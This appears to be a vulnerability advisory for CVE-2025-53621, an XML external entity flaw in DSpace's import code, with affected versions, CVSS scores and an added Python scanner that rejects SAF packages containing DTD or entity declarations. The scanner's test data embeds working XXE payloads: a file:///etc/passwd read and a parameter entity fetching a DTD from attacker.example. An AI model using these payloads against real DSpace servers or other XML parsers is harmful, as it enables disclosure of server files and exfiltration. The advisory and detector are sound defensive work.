XML External Entity Injection Vulnerability in DSpace Repository Software
CVE-2025-53621

6.9 MEDIUM

Key Information:

Vendor: DSpace
Status: Vendor
CVE Published: 15 July 2025

What is CVE-2025-53621?

DSpace, the open source repository platform, did not disable external entity resolution in the XML parsers used by its import code. All releases before 7.6.4, 8.2 and 9.1 are affected. When an XML file is imported, whether from the command line or through the user interface (for example the metadata files inside a Simple Archive Format (SAF) package), a crafted DOCTYPE can declare external entities that make the server connect to attacker-chosen URLs or read local files that the Tomcat user can access. The contents of those files, including DSpace server configuration, can then surface in the import output or be sent to an attacker-controlled host. Exploitation requires a DSpace administrator to import the crafted XML, so the risk is concentrated in installations where administrators import archives they did not produce themselves. Upgrade to 7.6.4, 8.2 or 9.1 (or later); where that is not immediately possible, apply the vendor's manual patches to the affected parsers and only import SAF archives from trusted sources after reviewing their XML files for DTD and entity declarations.
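The "review SAF archives before import" mitigation is easy to automate. The following scanner is an added example, not DSpace code: it walks a SAF package directory, parses every .xml file with Python's expat parser, and rejects any file that declares a DOCTYPE, declares an entity (general or parameter, internal or external), or references an external entity. Legitimate dublin_core.xml and metadata_*.xml files never need those constructs, so any hit is grounds to refuse the package. The three sample files (one benign, one reading a local file through a general entity, one pulling a remote DTD through a parameter entity) are constructed for the example; the package layout it writes (item_*/dublin_core.xml plus an empty contents file) is an assumption of a minimal SAF item.

```python
"""Pre-import scanner for DSpace Simple Archive Format (SAF) packages.

Added example, not part of DSpace. Rejects XML files that carry the
constructs an XXE payload depends on (DOCTYPE, entity declarations,
external entity references) instead of trying to resolve them safely.
"""
import os
import sys
import tempfile
from xml.parsers import expat

# Constructed sample metadata files for the demonstration.
BENIGN_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<dublin_core schema="dc">
  <dcvalue element="title" qualifier="none">An ordinary item</dcvalue>
</dublin_core>
"""

# Classic local file read: the entity body is substituted into the title.
XXE_FILE_READ = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE dublin_core [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<dublin_core schema="dc">
  <dcvalue element="title" qualifier="none">&xxe;</dcvalue>
</dublin_core>
"""

# Out-of-band variant: a parameter entity fetches an attacker-hosted DTD.
XXE_PARAMETER_ENTITY = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE dublin_core [
  <!ENTITY % remote SYSTEM "http://attacker.example/evil.dtd">
  %remote;
]>
<dublin_core schema="dc"/>
"""


class _Findings:
    """Collects expat DTD callbacks; nothing is ever fetched or expanded."""

    def __init__(self):
        self.problems = []

    def doctype(self, name, sysid, pubid, has_internal_subset):
        msg = f"DOCTYPE declared for <{name}>"
        if sysid:
            msg += f" with external DTD {sysid}"
        self.problems.append(msg)

    def entity(self, name, is_param, value, base, sysid, pubid, notation):
        ref = f"%{name};" if is_param else f"&{name};"
        kind = "parameter" if is_param else "general"
        if sysid:
            self.problems.append(f"external {kind} entity {ref} -> {sysid}")
        else:
            self.problems.append(f"internal {kind} entity {ref}")

    def external_ref(self, context, base, sysid, pubid):
        self.problems.append(f"external entity reference -> {sysid}")
        return 1  # report it as handled so expat continues without fetching


def scan_xml_bytes(data: bytes) -> list:
    """Return a list of problems found in one XML document (empty = clean)."""
    findings = _Findings()
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = findings.doctype
    parser.EntityDeclHandler = findings.entity
    parser.ExternalEntityRefHandler = findings.external_ref
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        # Malformed input (including expat's amplification-limit errors)
        # is rejected as well rather than passed on to the importer.
        findings.problems.append(f"not well-formed: {exc}")
    return findings.problems


def scan_saf_package(root: str) -> dict:
    """Return {relative path: problems} for every .xml file that has findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                problems = scan_xml_bytes(fh.read())
            if problems:
                report[os.path.relpath(path, root)] = problems
    return report


def build_sample_saf() -> str:
    """Write a three-item SAF package to a temp dir (constructed test data)."""
    root = tempfile.mkdtemp(prefix="saf_")
    items = (("item_001", BENIGN_XML),
             ("item_002", XXE_FILE_READ),
             ("item_003", XXE_PARAMETER_ENTITY))
    for item, payload in items:
        d = os.path.join(root, item)
        os.makedirs(d)
        with open(os.path.join(d, "dublin_core.xml"), "wb") as fh:
            fh.write(payload)
        with open(os.path.join(d, "contents"), "w") as fh:
            fh.write("")  # assumed minimal SAF item manifest
    return root


def main() -> int:
    root = build_sample_saf()
    report = scan_saf_package(root)
    for path, problems in sorted(report.items()):
        print(f"REJECT {path}")
        for p in problems:
            print(f"    - {p}")
    if report:
        print("Package rejected: do not import.")
        return 1
    print("No DTD or entity constructs found.")
    return 0


if __name__ == "__main__":
    sys.exit(main())
```

Run it against a real package with `scan_saf_package("/path/to/saf")` before handing the directory to the importer. The scan is a gate for untrusted archives, not a substitute for the upgrade: the parser on the import path itself must refuse DTDs, which is what the fixed releases do.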

Affected Version(s)

DSpace < 7.6.4 (fixed in 7.6.4)
DSpace >= 8.0, < 8.2 (fixed in 8.2)
DSpace >= 9.0, < 9.1 (fixed in 9.1)

CVSS V3.1

Score: 6.9
Severity: MEDIUM
Confidentiality: High
Integrity: None
Availability: High
Attack Vector: Network
Attack Complexity: Low
Privileges Required: High
User Interaction: Required
Scope: Changed

Timeline

  • Vulnerability published: 15 July 2025

  • Vulnerability reserved